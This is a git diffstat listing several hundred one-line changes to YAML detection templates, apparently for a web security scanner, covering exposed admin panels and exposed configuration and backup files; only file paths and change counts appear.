http/exposed-panels/ibm/ibm-service-assistant.yaml | 2 +- http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-websphere-panel.yaml | 2 +- http/exposed-panels/icc-pro-login.yaml | 2 +- http/exposed-panels/icewarp-panel-detect.yaml | 2 +- http/exposed-panels/icinga-web-login.yaml | 2 +- http/exposed-panels/ictprotege-login-panel.yaml | 2 +- http/exposed-panels/identity-services-engine.yaml | 2 +- http/exposed-panels/ilch-admin-panel.yaml | 2 +- http/exposed-panels/ilias-panel.yaml | 2 +- http/exposed-panels/incapptic-connect-panel.yaml | 2 +- http/exposed-panels/influxdb-panel.yaml | 2 +- http/exposed-panels/intelbras-login.yaml | 2 +- http/exposed-panels/intelbras-panel.yaml | 2 +- http/exposed-panels/intellian-aptus-panel.yaml | 2 +- http/exposed-panels/intelliflash-login-panel.yaml | 2 +- http/exposed-panels/iomega-emc-shared-nas.yaml | 2 +- http/exposed-panels/ipdiva-mediation-panel.yaml | 2 +- http/exposed-panels/iptime-router.yaml | 2 +- http/exposed-panels/issabel-login.yaml | 2 +- http/exposed-panels/istat-panel-detect.yaml | 2 +- http/exposed-panels/itop-panel.yaml | 2 +- http/exposed-panels/ixbus/ixbusweb-version.yaml | 2 +- http/exposed-panels/ixcache-panel.yaml | 2 +- http/exposed-panels/jamf-login.yaml | 2 +- http/exposed-panels/jamf-panel.yaml | 2 +- http/exposed-panels/jamf-setup-assistant.yaml | 2 +- http/exposed-panels/jaspersoft-panel.yaml | 2 +- http/exposed-panels/jboss/jboss-jbpm-admin.yaml | 2 +- http/exposed-panels/jboss/jboss-juddi.yaml | 2 +- http/exposed-panels/jboss/jboss-soa-platform.yaml | 2 +- http/exposed-panels/jboss/jmx-console.yaml | 2 +- http/exposed-panels/jboss/wildfly-panel.yaml | 2 +- http/exposed-panels/jcms-panel.yaml | 2 +- http/exposed-panels/jeedom-panel.yaml | 2 +- http/exposed-panels/jenkins-api-panel.yaml | 2 +- http/exposed-panels/jenkins-login.yaml | 2 +- http/exposed-panels/jfrog-login.yaml | 2 +- http/exposed-panels/joget/joget-panel.yaml | 2 +- http/exposed-panels/joomla-panel.yaml | 2 +- http/exposed-panels/jumpserver-panel.yaml | 2 +- http/exposed-panels/jupyter-notebook.yaml | 2 +- http/exposed-panels/kafka-center-login.yaml | 2 +- http/exposed-panels/kafka-connect-ui.yaml | 2 +- http/exposed-panels/kafka-consumer-monitor.yaml | 2 +- http/exposed-panels/kafka-monitoring.yaml | 2 +- http/exposed-panels/kafka-topics-ui.yaml | 2 +- http/exposed-panels/kanboard-login.yaml | 2 +- http/exposed-panels/kavita-panel-detect.yaml | 2 +- http/exposed-panels/keenetic-web-login.yaml | 2 +- http/exposed-panels/kenesto-login.yaml | 2 +- http/exposed-panels/kentico-login.yaml | 2 +- http/exposed-panels/kerio-connect-client.yaml | 2 +- http/exposed-panels/kettle-panel.yaml | 2 +- http/exposed-panels/keycloak-admin-panel.yaml | 2 +- http/exposed-panels/kfm/kaes-file-manager.yaml | 2 +- http/exposed-panels/kfm/kfm-login-panel.yaml | 2 +- http/exposed-panels/kibana-panel.yaml | 2 +- http/exposed-panels/kiwitcms-login.yaml | 2 +- http/exposed-panels/kkfileview-panel.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kraken-cluster-monitoring.yaml | 2 +- http/exposed-panels/kronos-workforce-central.yaml | 2 +- http/exposed-panels/kubernetes-dashboard.yaml | 2 +- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 2 +- http/exposed-panels/kubernetes-web-view.yaml | 2 +- http/exposed-panels/kubeview-dashboard.yaml | 2 +- http/exposed-panels/labkey-server-login.yaml | 2 +- http/exposed-panels/labtech-panel.yaml | 2 +- http/exposed-panels/lacie-panel.yaml | 2 +- http/exposed-panels/lancom-router-panel.yaml | 2 +- http/exposed-panels/landrayoa-panel.yaml | 2 +- http/exposed-panels/lansweeper-login.yaml | 2 +- http/exposed-panels/lantronix-webmanager-panel.yaml | 2 +- http/exposed-panels/laravel-filemanager.yaml | 2 +- http/exposed-panels/ldap-account-manager-panel.yaml | 2 +- http/exposed-panels/lenovo-fp-panel.yaml | 2 +- http/exposed-panels/lenovo-thinkserver-panel.yaml | 2 +- http/exposed-panels/leostream-panel.yaml | 2 +- http/exposed-panels/librenms-login.yaml | 2 +- http/exposed-panels/liferay-portal.yaml | 2 +- http/exposed-panels/linkerd-panel.yaml | 2 +- http/exposed-panels/linksys-wifi-login.yaml | 2 +- http/exposed-panels/livehelperchat-admin-panel.yaml | 2 +- http/exposed-panels/livezilla-login-panel.yaml | 2 +- http/exposed-panels/locklizard-webviewer-panel.yaml | 2 +- http/exposed-panels/logitech-harmony-portal.yaml | 2 +- http/exposed-panels/looker-panel.yaml | 2 +- http/exposed-panels/loxone-panel.yaml | 2 +- http/exposed-panels/lucee-login.yaml | 2 +- http/exposed-panels/luci-login-detection.yaml | 2 +- http/exposed-panels/mach-proweb-login.yaml | 2 +- http/exposed-panels/machform-admin-panel.yaml | 2 +- http/exposed-panels/maestro-login-panel.yaml | 2 +- http/exposed-panels/mag-dashboard-panel.yaml | 2 +- http/exposed-panels/magento-admin-panel.yaml | 2 +- http/exposed-panels/magento-downloader-panel.yaml | 2 +- http/exposed-panels/magnolia-panel.yaml | 2 +- http/exposed-panels/mailhog-panel.yaml | 2 +- http/exposed-panels/mailwatch-login.yaml | 2 +- http/exposed-panels/mantisbt-panel.yaml | 2 +- http/exposed-panels/matomo-login-portal.yaml | 2 +- http/exposed-panels/mautic-crm-panel.yaml | 2 +- http/exposed-panels/meshcentral-login.yaml | 2 +- http/exposed-panels/metabase-panel.yaml | 2 +- http/exposed-panels/metasploit-setup-page.yaml | 2 +- http/exposed-panels/metersphere-login.yaml | 2 +- http/exposed-panels/mfiles-web-detect.yaml | 2 +- http/exposed-panels/microfocus-admin-server.yaml | 2 +- http/exposed-panels/microfocus-filr-panel.yaml | 2 +- http/exposed-panels/microfocus-vibe-panel.yaml | 2 +- http/exposed-panels/microsoft-exchange-panel.yaml | 2 +- http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml | 2 +- http/exposed-panels/mikrotik/mikrotik-routeros.yaml | 2 +- http/exposed-panels/mini-start-page.yaml | 2 +- http/exposed-panels/minio-browser.yaml | 2 +- http/exposed-panels/minio-console.yaml | 2 +- http/exposed-panels/mitel-panel-detect.yaml | 2 +- http/exposed-panels/mobile-management-panel.yaml | 2 +- http/exposed-panels/mobileiron-login.yaml | 2 +- http/exposed-panels/modoboa-panel.yaml | 2 +- http/exposed-panels/mongodb-ops-manager.yaml | 2 +- http/exposed-panels/monitorix-exposure.yaml | 2 +- http/exposed-panels/monstra-admin-panel.yaml | 2 +- http/exposed-panels/movable-type-login.yaml | 2 +- http/exposed-panels/mpftvc-admin-panel.yaml | 2 +- http/exposed-panels/ms-adcs-detect.yaml | 2 +- http/exposed-panels/mspcontrol-login.yaml | 2 +- http/exposed-panels/mybb-forum-detect.yaml | 2 +- http/exposed-panels/mybb/mybb-forum-install.yaml | 2 +- http/exposed-panels/mylittleadmin-panel.yaml | 2 +- http/exposed-panels/mylittlebackup-panel.yaml | 2 +- http/exposed-panels/mystrom-panel.yaml | 2 +- http/exposed-panels/nagios-panel.yaml | 2 +- http/exposed-panels/nagios-xi-panel.yaml | 2 +- http/exposed-panels/nagvis-panel.yaml | 2 +- http/exposed-panels/ncentral-panel.yaml | 2 +- http/exposed-panels/nconf-panel.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/neobox-panel.yaml | 2 +- http/exposed-panels/neos-panel.yaml | 2 +- http/exposed-panels/nessus-panel.yaml | 2 +- http/exposed-panels/netdata-dashboard-detected.yaml | 2 +- http/exposed-panels/netdata-panel.yaml | 2 +- http/exposed-panels/netflix-conductor-ui.yaml | 2 +- http/exposed-panels/netgear-version-detect.yaml | 2 +- http/exposed-panels/netis-router.yaml | 2 +- http/exposed-panels/netlify-cms.yaml | 2 +- http/exposed-panels/netris-dashboard-panel.yaml | 2 +- http/exposed-panels/netscaler-aaa-login.yaml | 2 +- http/exposed-panels/netscaler-gateway.yaml | 2 +- http/exposed-panels/netsparker-panel.yaml | 2 +- http/exposed-panels/netsus-server-login.yaml | 2 +- http/exposed-panels/nginx-admin-panel.yaml | 2 +- http/exposed-panels/nginx-proxy-manager.yaml | 2 +- http/exposed-panels/nginx-ui-dashboard.yaml | 2 +- http/exposed-panels/noescape-login.yaml | 2 +- http/exposed-panels/nordex-wind-farm-portal.yaml | 2 +- http/exposed-panels/normhost-backup-server-manager.yaml | 2 +- http/exposed-panels/novnc-login-panel.yaml | 2 +- http/exposed-panels/nozomi-panel.yaml | 2 +- http/exposed-panels/np-data-cache.yaml | 2 +- http/exposed-panels/nport-web-console.yaml | 2 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- http/exposed-panels/nutanix-web-console-login.yaml | 2 +- http/exposed-panels/nuxeo-platform-panel.yaml | 2 +- http/exposed-panels/nzbget-panel.yaml | 2 +- http/exposed-panels/o2-easy-panel.yaml | 2 +- http/exposed-panels/ocomon-panel.yaml | 2 +- http/exposed-panels/ocs-inventory-login.yaml | 2 +- http/exposed-panels/octoprint-login.yaml | 2 +- http/exposed-panels/officekeeper-admin-login.yaml | 2 +- http/exposed-panels/oipm-detect.yaml | 2 +- http/exposed-panels/oki-data.yaml | 2 +- http/exposed-panels/okiko-sfiler-portal.yaml | 2 +- http/exposed-panels/okta-panel.yaml | 2 +- http/exposed-panels/olt-web-interface.yaml | 2 +- http/exposed-panels/omniampx-panel.yaml | 2 +- http/exposed-panels/open-game-panel.yaml | 2 +- http/exposed-panels/open-stack-dashboard-login.yaml | 2 +- http/exposed-panels/open-virtualization-manager-panel.yaml | 2 +- http/exposed-panels/openam-panel.yaml | 2 +- http/exposed-panels/openbmcs-detect.yaml | 2 +- http/exposed-panels/opencart-panel.yaml | 2 +- http/exposed-panels/opencast-detect.yaml | 2 +- http/exposed-panels/opencats-panel.yaml | 2 +- http/exposed-panels/opencpu-panel.yaml | 2 +- http/exposed-panels/openemr-detect.yaml | 2 +- http/exposed-panels/openerp-database.yaml | 2 +- http/exposed-panels/openfire-admin-panel.yaml | 2 +- http/exposed-panels/opengear-panel.yaml | 2 +- http/exposed-panels/opennebula-panel.yaml | 2 +- http/exposed-panels/opennms-web-console.yaml | 2 +- http/exposed-panels/opensis-panel.yaml | 2 +- http/exposed-panels/openvpn-admin.yaml | 2 +- http/exposed-panels/openvpn-connect.yaml | 2 +- http/exposed-panels/openvpn-monitor.yaml | 2 +- http/exposed-panels/openvpn-router-management.yaml | 2 +- http/exposed-panels/openvz-web-login.yaml | 2 +- http/exposed-panels/openx-panel.yaml | 2 +- http/exposed-panels/oracle-business-control.yaml | 2 +- http/exposed-panels/oracle-business-intelligence.yaml | 2 +- http/exposed-panels/oracle-containers-panel.yaml | 2 +- http/exposed-panels/oracle-enterprise-manager-login.yaml | 2 +- http/exposed-panels/oracle-integrated-manager.yaml | 2 +- http/exposed-panels/oracle-people-enterprise.yaml | 2 +- http/exposed-panels/oracle-people-sign-in.yaml | 2 +- http/exposed-panels/orchid-vms-panel.yaml | 2 +- http/exposed-panels/osticket-panel.yaml | 2 +- http/exposed-panels/osticket/osticket-install.yaml | 2 +- http/exposed-panels/otobo-panel.yaml | 2 +- http/exposed-panels/ourmgmt3-panel.yaml | 2 +- http/exposed-panels/pacs-connexion-utilisateur.yaml | 2 +- http/exposed-panels/pagespeed-global-admin.yaml | 2 +- http/exposed-panels/panabit-panel.yaml | 2 +- http/exposed-panels/pandora-fms-console.yaml | 2 +- http/exposed-panels/parallels-html-client.yaml | 2 +- http/exposed-panels/parallels/parallels-hsphere-detect.yaml | 2 +- http/exposed-panels/parse-dashboard.yaml | 2 +- http/exposed-panels/payroll-management-system-panel.yaml | 2 +- http/exposed-panels/pega-web-panel.yaml | 2 +- http/exposed-panels/pentaho-panel.yaml | 2 +- http/exposed-panels/persis-panel.yaml | 2 +- http/exposed-panels/pfsense-login.yaml | 2 +- http/exposed-panels/pgadmin-exposure.yaml | 2 +- http/exposed-panels/phabricator-login.yaml | 2 +- http/exposed-panels/phoronix-pane.yaml | 2 +- http/exposed-panels/php-mailer.yaml | 2 +- http/exposed-panels/phpcollab-panel.yaml | 2 +- http/exposed-panels/phpldap-admin.yaml | 2 +- http/exposed-panels/phpminiadmin-panel.yaml | 2 +- http/exposed-panels/phpmyadmin-panel.yaml | 2 +- http/exposed-panels/phppgadmin-panel.yaml | 2 +- http/exposed-panels/pichome-panel.yaml | 2 +- http/exposed-panels/piwigo-panel.yaml | 2 +- http/exposed-panels/planet-estream-panel.yaml | 2 +- http/exposed-panels/plastic-scm-login.yaml | 2 +- http/exposed-panels/plesk-obsidian-login.yaml | 2 +- http/exposed-panels/plesk-onyx-login.yaml | 2 +- http/exposed-panels/polycom-admin-detect.yaml | 2 +- http/exposed-panels/polycom-login.yaml | 2 +- http/exposed-panels/posthog-admin-panel.yaml | 2 +- http/exposed-panels/powerjob-panel.yaml | 2 +- http/exposed-panels/powerlogic-ion.yaml | 2 +- http/exposed-panels/privx-panel.yaml | 2 +- http/exposed-panels/processwire-login.yaml | 2 +- http/exposed-panels/project-insight-login.yaml | 2 +- http/exposed-panels/projectsend-login.yaml | 2 +- http/exposed-panels/prometheus-exposed-panel.yaml | 2 +- http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml | 2 +- http/exposed-panels/pulsar-admin-console.yaml | 2 +- http/exposed-panels/pulsar-adminui-panel.yaml | 2 +- http/exposed-panels/pulsar360-admin-panel.yaml | 2 +- http/exposed-panels/pulse-secure-panel.yaml | 2 +- http/exposed-panels/puppetboard-panel.yaml | 2 +- http/exposed-panels/pure-storage-login.yaml | 2 +- http/exposed-panels/pypicloud-panel.yaml | 2 +- http/exposed-panels/qlik-sense-server.yaml | 2 +- http/exposed-panels/qmail-admin-login.yaml | 2 +- http/exposed-panels/qnap/qnap-photostation-panel.yaml | 2 +- http/exposed-panels/qnap/qnap-qts-panel.yaml | 2 +- http/exposed-panels/qualcomm-voip-router.yaml | 2 +- http/exposed-panels/qualtrics-login.yaml | 2 +- http/exposed-panels/quantum-scalar-detect.yaml | 2 +- http/exposed-panels/r-webserver-login.yaml | 2 +- http/exposed-panels/rabbitmq-dashboard.yaml | 2 +- http/exposed-panels/racksnet-login.yaml | 2 +- http/exposed-panels/radius-manager.yaml | 2 +- http/exposed-panels/rancher-panel.yaml | 2 +- http/exposed-panels/raspberrymatic-panel.yaml | 2 +- http/exposed-panels/redash-panel.yaml | 2 +- http/exposed-panels/redhat/redhat-satellite-panel.yaml | 2 +- http/exposed-panels/redis-commander-exposure.yaml | 2 +- http/exposed-panels/remedy-axis-login.yaml | 2 +- http/exposed-panels/remkon-manager-panel.yaml | 2 +- http/exposed-panels/remote-ui-login.yaml | 2 +- http/exposed-panels/residential-gateway-login.yaml | 2 +- http/exposed-panels/retool-login.yaml | 2 +- http/exposed-panels/riseup-panel.yaml | 2 +- http/exposed-panels/room-alert-detect.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- http/exposed-panels/royalevent-management-panel.yaml | 2 +- http/exposed-panels/rsa-self-service.yaml | 2 +- http/exposed-panels/rstudio-detect.yaml | 2 +- http/exposed-panels/ruckus-unleashed-panel.yaml | 2 +- http/exposed-panels/ruckus-wireless-admin-login.yaml | 2 +- http/exposed-panels/ruijie/rg-uac-panel.yaml | 2 +- http/exposed-panels/rundeck-login.yaml | 2 +- http/exposed-panels/rustici-content-controller.yaml | 2 +- http/exposed-panels/saferoads-vms-login.yaml | 2 +- http/exposed-panels/sage-panel.yaml | 2 +- http/exposed-panels/saltgui-panel.yaml | 2 +- http/exposed-panels/saltstack-config-panel.yaml | 2 +- http/exposed-panels/samba-swat-panel.yaml | 2 +- http/exposed-panels/samsung-printer-detect.yaml | 2 +- http/exposed-panels/sap-cloud-analytics.yaml | 2 +- http/exposed-panels/sap-hana-xsengine-panel.yaml | 2 +- http/exposed-panels/sap-netweaver-portal.yaml | 2 +- http/exposed-panels/sap-successfactors-detect.yaml | 2 +- http/exposed-panels/sapfiori-panel.yaml | 2 +- http/exposed-panels/sas-login-panel.yaml | 2 +- http/exposed-panels/sauter-login.yaml | 2 +- http/exposed-panels/scs-landfill-control.yaml | 2 +- http/exposed-panels/seafile-panel.yaml | 2 +- http/exposed-panels/seats-login.yaml | 2 +- http/exposed-panels/secmail-detect.yaml | 2 +- http/exposed-panels/secnet-ac-panel.yaml | 2 +- http/exposed-panels/secure-login-panel.yaml | 2 +- http/exposed-panels/securenvoy-panel.yaml | 2 +- http/exposed-panels/securepoint-utm.yaml | 2 +- http/exposed-panels/securityspy-detect.yaml | 2 +- http/exposed-panels/seeddms-panel.yaml | 2 +- http/exposed-panels/selenium-grid.yaml | 2 +- http/exposed-panels/selenoid-ui-exposure.yaml | 2 +- http/exposed-panels/sensu-panel.yaml | 2 +- http/exposed-panels/sentinelone-console.yaml | 2 +- http/exposed-panels/sequoiadb-login.yaml | 2 +- http/exposed-panels/server-backup-login.yaml | 2 +- http/exposed-panels/server-backup-manager-se.yaml | 2 +- http/exposed-panels/servicedesk-login-panel.yaml | 2 +- http/exposed-panels/sgp-login-panel.yaml | 2 +- http/exposed-panels/sharecenter-login.yaml | 2 +- http/exposed-panels/shoutcast-server.yaml | 2 +- http/exposed-panels/sicom-panel.yaml | 2 +- http/exposed-panels/sidekiq-dashboard.yaml | 2 +- http/exposed-panels/signet-explorer-dashboard.yaml | 2 +- http/exposed-panels/sitecore-login-panel.yaml | 2 +- http/exposed-panels/sitecore-login.yaml | 2 +- http/exposed-panels/sitefinity-login.yaml | 2 +- http/exposed-panels/siteomat-login.yaml | 2 +- http/exposed-panels/skycaiji-admin-panel.yaml | 2 +- http/exposed-panels/slocum-login.yaml | 2 +- http/exposed-panels/smartping-dashboard.yaml | 2 +- http/exposed-panels/solarview-compact-panel.yaml | 2 +- http/exposed-panels/solarwinds-orion.yaml | 2 +- http/exposed-panels/solarwinds-servuftp-detect.yaml | 2 +- http/exposed-panels/solr-panel-exposure.yaml | 2 +- http/exposed-panels/somansa-dlp-detect.yaml | 2 +- http/exposed-panels/somfy-login.yaml | 2 +- http/exposed-panels/sonarqube-login.yaml | 2 +- http/exposed-panels/sonic-wall-application.yaml | 2 +- http/exposed-panels/sonicwall-analyzer-login.yaml | 2 +- http/exposed-panels/sonicwall-management-panel.yaml | 2 +- http/exposed-panels/sonicwall-sslvpn-panel.yaml | 2 +- http/exposed-panels/sophos-fw-version-detect.yaml | 2 +- http/exposed-panels/sophos-mobile-panel.yaml | 2 +- http/exposed-panels/spark-panel.yaml | 2 +- http/exposed-panels/sphider-login.yaml | 2 +- http/exposed-panels/spiderfoot.yaml | 2 +- http/exposed-panels/splunk-enterprise-panel.yaml | 2 +- http/exposed-panels/splunk-login.yaml | 2 +- http/exposed-panels/sql-monitor.yaml | 2 +- http/exposed-panels/sqlbuddy-panel.yaml | 2 +- http/exposed-panels/squirrelmail-login.yaml | 2 +- http/exposed-panels/sqwebmail-login-panel.yaml | 2 +- http/exposed-panels/star-network-utility.yaml | 2 +- http/exposed-panels/start-element-manager-panel.yaml | 2 +- http/exposed-panels/steve-login-panel.yaml | 2 +- http/exposed-panels/storybook-panel.yaml | 2 +- http/exposed-panels/strapi-documentation.yaml | 2 +- http/exposed-panels/strapi-panel.yaml | 2 +- http/exposed-panels/stridercd-panel.yaml | 2 +- http/exposed-panels/submitty-login.yaml | 2 +- http/exposed-panels/subrion-login.yaml | 2 +- http/exposed-panels/sugarcrm-panel.yaml | 2 +- http/exposed-panels/sungrow-logger1000-detect.yaml | 2 +- http/exposed-panels/superadmin-ui-panel.yaml | 2 +- http/exposed-panels/supermicro-bmc-panel.yaml | 2 +- http/exposed-panels/superset-login.yaml | 2 +- http/exposed-panels/supervpn-panel.yaml | 2 +- http/exposed-panels/symantec/symantec-dlp-login.yaml | 2 +- http/exposed-panels/symantec/symantec-epm-login.yaml | 2 +- http/exposed-panels/symantec/symantec-ewep-login.yaml | 2 +- .../symantec/symantec-pgp-global-directory.yaml | 2 +- http/exposed-panels/synapse-mobility-panel.yaml | 2 +- http/exposed-panels/syncthru-web-service.yaml | 2 +- http/exposed-panels/synnefo-admin-panel.yaml | 2 +- http/exposed-panels/sysaid-panel.yaml | 2 +- http/exposed-panels/tableau-panel.yaml | 2 +- http/exposed-panels/tableau-service-manager.yaml | 2 +- http/exposed-panels/teamcity-login-panel.yaml | 2 +- http/exposed-panels/teampass-panel.yaml | 2 +- http/exposed-panels/tectuus-scada-monitor.yaml | 2 +- http/exposed-panels/tekton-dashboard.yaml | 2 +- http/exposed-panels/telerik-server-login.yaml | 2 +- http/exposed-panels/telesquare/tlr-2005ksh-login.yaml | 2 +- http/exposed-panels/teltonika-login.yaml | 2 +- http/exposed-panels/tembosocial-panel.yaml | 2 +- http/exposed-panels/temenos-t24-login.yaml | 2 +- http/exposed-panels/tenda-11n-wireless-router-login.yaml | 2 +- http/exposed-panels/tenda-web-master.yaml | 2 +- http/exposed-panels/teradici-pcoip-panel.yaml | 2 +- http/exposed-panels/terraform-enterprise-panel.yaml | 2 +- http/exposed-panels/terramaster-login.yaml | 2 +- http/exposed-panels/thinfinity-virtualui-panel.yaml | 2 +- http/exposed-panels/threatq-login.yaml | 2 +- http/exposed-panels/thruk-login.yaml | 2 +- http/exposed-panels/tikiwiki-cms.yaml | 2 +- http/exposed-panels/tiny-file-manager.yaml | 2 +- http/exposed-panels/tooljet-panel.yaml | 2 +- http/exposed-panels/total-web-solutions-panel.yaml | 2 +- http/exposed-panels/totemomail-panel.yaml | 2 +- http/exposed-panels/tracer-sc-login.yaml | 2 +- http/exposed-panels/traefik-dashboard.yaml | 2 +- http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml | 2 +- http/exposed-panels/tufin-securetrack-login.yaml | 2 +- http/exposed-panels/turnkey-openvpn.yaml | 2 +- http/exposed-panels/tuxedo-connected-controller.yaml | 2 +- http/exposed-panels/typo3-login.yaml | 2 +- http/exposed-panels/umbraco-login.yaml | 2 +- http/exposed-panels/unauth-xproxy-dashboard.yaml | 2 +- http/exposed-panels/unauthenticated-frp.yaml | 2 +- http/exposed-panels/unifi-panel.yaml | 2 +- http/exposed-panels/user-control-panel.yaml | 2 +- http/exposed-panels/v2924-admin-panel.yaml | 2 +- http/exposed-panels/vault-panel.yaml | 2 +- http/exposed-panels/veeam-backup-azure-panel.yaml | 2 +- http/exposed-panels/veeam-backup-gcp.yaml | 2 +- http/exposed-panels/veeam-panel.yaml | 2 +- http/exposed-panels/verizon-router-panel.yaml | 2 +- http/exposed-panels/versa/versa-director-login.yaml | 2 +- http/exposed-panels/versa/versa-flexvnf-panel.yaml | 2 +- http/exposed-panels/versa/versa-sdwan.yaml | 2 +- http/exposed-panels/vertex-tax-panel.yaml | 2 +- http/exposed-panels/vidyo-login.yaml | 2 +- http/exposed-panels/vigor-login.yaml | 2 +- http/exposed-panels/virtua-software-panel.yaml | 2 +- http/exposed-panels/virtual-ema-detect.yaml | 2 +- http/exposed-panels/vmware-carbon-black-edr.yaml | 2 +- http/exposed-panels/vmware-cloud-availability.yaml | 2 +- http/exposed-panels/vmware-cloud-director.yaml | 2 +- http/exposed-panels/vmware-ftp-server.yaml | 2 +- http/exposed-panels/vmware-hcx-login.yaml | 2 +- http/exposed-panels/vmware-horizon-panel.yaml | 2 +- http/exposed-panels/vmware-nsx-login.yaml | 2 +- http/exposed-panels/vmware-vcenter-converter-standalone.yaml | 2 +- http/exposed-panels/vmware-vcloud-director.yaml | 2 +- http/exposed-panels/vodafone-voxui-panel.yaml | 2 +- http/exposed-panels/voipmonitor-panel.yaml | 2 +- http/exposed-panels/vrealize-loginsight-panel.yaml | 2 +- http/exposed-panels/wago-plc-panel.yaml | 2 +- http/exposed-panels/wagtail-cms-detect.yaml | 2 +- http/exposed-panels/wallix-accessmanager-panel.yaml | 2 +- http/exposed-panels/wampserver-homepage.yaml | 2 +- http/exposed-panels/watchguard-panel.yaml | 2 +- http/exposed-panels/watershed-panel.yaml | 2 +- http/exposed-panels/weatherlink.yaml | 2 +- http/exposed-panels/weave-scope-dashboard.yaml | 2 +- http/exposed-panels/web-file-manager.yaml | 2 +- http/exposed-panels/web-local-craft.yaml | 2 +- http/exposed-panels/web-service-panel.yaml | 2 +- http/exposed-panels/webeditors-check-detect.yaml | 2 +- http/exposed-panels/weblogic-login.yaml | 2 +- http/exposed-panels/weblogic-uddiexplorer.yaml | 2 +- http/exposed-panels/webmin-panel.yaml | 2 +- http/exposed-panels/webmodule-ee-panel.yaml | 2 +- http/exposed-panels/webpagetest-panel.yaml | 2 +- http/exposed-panels/webroot-login.yaml | 2 +- http/exposed-panels/webshell4-login-panel.yaml | 2 +- http/exposed-panels/webuzo-admin-panel.yaml | 2 +- http/exposed-panels/weiphp-panel.yaml | 2 +- http/exposed-panels/whm-login-detect.yaml | 2 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/wmw-enterprise-panel.yaml | 2 +- http/exposed-panels/wordpress-login.yaml | 2 +- http/exposed-panels/workresources-rdp.yaml | 2 +- http/exposed-panels/workspace-one-uem.yaml | 2 +- http/exposed-panels/wowza-streaming-engine.yaml | 2 +- http/exposed-panels/wso2-management-console.yaml | 2 +- http/exposed-panels/xds-amr-status.yaml | 2 +- http/exposed-panels/xeams-admin-console.yaml | 2 +- http/exposed-panels/xenmobile-login.yaml | 2 +- http/exposed-panels/xfinity-panel.yaml | 2 +- http/exposed-panels/xiaomi-wireless-router-login.yaml | 2 +- http/exposed-panels/xibocms-login.yaml | 2 +- http/exposed-panels/xnat-login.yaml | 2 +- http/exposed-panels/xoops/xoops-installation-wizard.yaml | 2 +- http/exposed-panels/xvr-login.yaml | 2 +- http/exposed-panels/xweb500-panel.yaml | 2 +- http/exposed-panels/xxljob-panel.yaml | 2 +- http/exposed-panels/yarn-manager-exposure.yaml | 2 +- http/exposed-panels/yopass-panel.yaml | 2 +- http/exposed-panels/yzmcms-panel.yaml | 2 +- http/exposed-panels/zabbix-server-login.yaml | 2 +- http/exposed-panels/zblog-exposed-admin-panel.yaml | 2 +- http/exposed-panels/zblogphp-panel.yaml | 2 +- http/exposed-panels/zenario-login-panel.yaml | 2 +- http/exposed-panels/zentao-detect.yaml | 2 +- http/exposed-panels/zentral-panel.yaml | 2 +- http/exposed-panels/zeroshell-login.yaml | 2 +- http/exposed-panels/zimbra-web-client.yaml | 2 +- http/exposed-panels/zimbra-web-login.yaml | 2 +- http/exposed-panels/zipkin-exposure.yaml | 2 +- http/exposed-panels/zoho/manageengine-adaudit.yaml | 2 +- http/exposed-panels/zoho/manageengine-adselfservice.yaml | 2 +- http/exposed-panels/zoho/manageengine-analytics.yaml | 2 +- http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml | 2 +- .../zoho/manageengine-applications-manager.yaml | 2 +- http/exposed-panels/zoho/manageengine-assetexplorer.yaml | 2 +- http/exposed-panels/zoho/manageengine-desktop.yaml | 2 +- http/exposed-panels/zoho/manageengine-keymanagerplus.yaml | 2 +- http/exposed-panels/zoho/manageengine-network-config.yaml | 2 +- http/exposed-panels/zoho/manageengine-opmanager.yaml | 2 +- http/exposed-panels/zoho/manageengine-servicedesk.yaml | 2 +- http/exposed-panels/zoho/manageengine-supportcenter.yaml | 2 +- http/exposed-panels/zoneminder-login.yaml | 2 +- http/exposed-panels/zte-panel.yaml | 2 +- http/exposed-panels/zuul-panel.yaml | 2 +- http/exposed-panels/zyxel-router-panel.yaml | 2 +- http/exposed-panels/zyxel/zyxel-firewall-panel.yaml | 2 +- http/exposures/apis/couchbase-buckets-api.yaml | 2 +- http/exposures/apis/openapi.yaml | 2 +- http/exposures/apis/strapi-page.yaml | 2 +- http/exposures/apis/swagger-api.yaml | 2 +- http/exposures/apis/wadl-api.yaml | 2 +- http/exposures/apis/wsdl-api.yaml | 2 +- http/exposures/backups/exposed-mysql-initial.yaml | 2 +- http/exposures/backups/froxlor-database-backup.yaml | 2 +- http/exposures/backups/settings-php-files.yaml | 2 +- http/exposures/backups/sql-dump.yaml | 2 +- http/exposures/backups/zip-backup-files.yaml | 2 +- http/exposures/configs/accueil-wampserver.yaml | 2 +- http/exposures/configs/airflow-configuration-exposure.yaml | 2 +- http/exposures/configs/alibaba-canal-info-leak.yaml | 2 +- http/exposures/configs/amazon-docker-config.yaml | 2 +- http/exposures/configs/ansible-config-disclosure.yaml | 2 +- http/exposures/configs/apache-config.yaml | 2 +- http/exposures/configs/appspec-yml-disclosure.yaml | 2 +- http/exposures/configs/appveyor-configuration-file.yaml | 2 +- http/exposures/configs/awstats-config.yaml | 2 +- http/exposures/configs/awstats-script.yaml | 2 +- http/exposures/configs/azure-domain-tenant.yaml | 2 +- http/exposures/configs/babel-config-exposure.yaml | 2 +- http/exposures/configs/behat-config.yaml | 2 +- http/exposures/configs/cakephp-config.yaml | 2 +- http/exposures/configs/cgi-printenv.yaml | 2 +- http/exposures/configs/circleci-config.yaml | 2 +- http/exposures/configs/circleci-ssh-config.yaml | 2 +- http/exposures/configs/cisco-network-config.yaml | 2 +- http/exposures/configs/codeception-config.yaml | 2 +- http/exposures/configs/codeigniter-env.yaml | 2 +- http/exposures/configs/composer-config.yaml | 2 +- http/exposures/configs/config-json.yaml | 2 +- http/exposures/configs/config-rb.yaml | 2 +- http/exposures/configs/configuration-listing.yaml | 2 +- http/exposures/configs/coremail-config-disclosure.yaml | 2 +- http/exposures/configs/cypress-web-config.yaml | 2 +- 